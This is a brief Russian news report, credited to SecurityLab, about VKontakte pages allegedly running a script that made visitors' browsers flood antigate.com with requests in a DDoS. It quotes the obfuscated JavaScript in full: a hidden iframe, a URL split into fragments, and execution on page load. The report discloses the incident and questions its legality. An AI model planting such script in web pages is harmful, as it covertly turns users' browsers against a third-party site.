Сегодня многие пользователи ВКонтакте, посетившие сайт социальной сети, могли стать невольными участниками DDoS атаки на сайт antigate.com.
На страницах пользователей загружался следующий javascript сценарий:
function _test() {
var fr=utilsNode.appendChild(ce('iframe')),d=fr.contentWindow.document;d.open();
d.write(' <script>this.location="http://ant'+'iga'+'te.com/i '+'n.php?'+'firs'+'t_an'+'d_la'+'st_wa'+'rnin'+ 'g=o'+'n";</sc'+'ript>');
setTimeout(re.pbind(fr),1000);
}
<body onresize="onBodyResize()" class="is_rtl font_default" onload="_test()">
Этот сценарий отправлял запрос на сайт antigate.com из браузера каждого пользователя соцсети «ВКонтакте» при каждой загрузке страницы.
Подобные действия со стороны администрации «ВКонтакте» не могут радовать, и невольно поднимается вопрос о моральности и законности (ст. 274 УК РФ) подобных действий.
Редакция SecurityLab отправила письмо в пресс-службу «ВКонтаке» с просьбой прокомментировать сложившуюся ситуацию, но на момент публикации новости ответ получен не был.
Источник: SecurityLab
|
